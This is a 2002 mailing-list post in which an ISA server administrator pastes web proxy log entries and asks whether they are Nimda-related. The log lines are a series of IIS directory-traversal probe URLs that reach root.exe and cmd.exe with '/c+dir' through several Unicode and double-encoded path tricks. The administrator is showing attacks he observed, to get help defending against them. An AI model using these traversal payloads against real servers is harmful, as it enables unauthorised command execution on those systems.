Any ideas on this entry in my Web proxy log?

From: "Rogers, Brian" <RogersB@xxxxxxxxxxxxxx>
To: "'[ISAserver.org Discussion List]'" <isalist@xxxxxxxxxxxxx>
Date: Wed, 9 Jan 2002 17:38:34 -0500
Im finding a lot of these in my Web Proxy log on my ISA server from various
External IP addresses.  Would this be nimda/goner/etc related?

My ISA server does not even run IIS.

12.14.65.42     anonymous       -       2002-01-09      16:40:24
ISASERVER       -       www     -       -       -       72      -       -
GET     http://www/scripts/root.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:25
ISASERVER       -       www     -       -       -       70      -       -
GET     http://www/MSADC/root.exe?/c+dir        -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:25
ISASERVER       -       www     -       -       -       80      -       -
GET     http://www/c/winnt/system32/cmd.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:25
ISASERVER       -       www     -       -       -       80      -       -
GET     http://www/d/winnt/system32/cmd.exe?/c+dir      -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26
ISASERVER       -       www     -       -       -       96      -       -
GET     http://www/scripts/..%255c../winnt/system32/cmd.exe?/c+dir      -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26
ISASERVER       -       www     -       -       -       117     -       -
GET
http://www/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26
ISASERVER       -       www     -       -       -       117     -       -
GET
http://www/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+
dir     -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:26
ISASERVER       -       www     -       -       -       145     -       -
GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir -       12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27
ISASERVER       -       www     -       -       -       97      -       -
GET     http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir     -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27
ISASERVER       -       www     -       -       -       97      -       -
GET     http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir     -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27
ISASERVER       -       www     -       -       -       97      -       -
GET     http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir     -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:27
ISASERVER       -       www     -       -       -       97      -       -
GET     http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir     -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28
ISASERVER       -       www     -       -       -       98      -       -
GET     http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir    -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28
ISASERVER       -       www     -       -       -       96      -       -
GET     http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir      -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28
ISASERVER       -       www     -       -       -       100     -       -
GET     http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir  -
12202
12.14.65.42     anonymous       -       2002-01-09      16:40:28
ISASERVER       -       www     -       -       -       96      -       -
GET     http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir      -
12202

Brian W. Rogers
MCSE, MCT, MCP
Client/Server Network Developer
Tree of Life Corporation
rogersb@xxxxxxxxxxxxxx
office: (904)940-2152
mobile: (904)806-7173
Any ideas on this entry in my Web proxy log?

Other related posts:
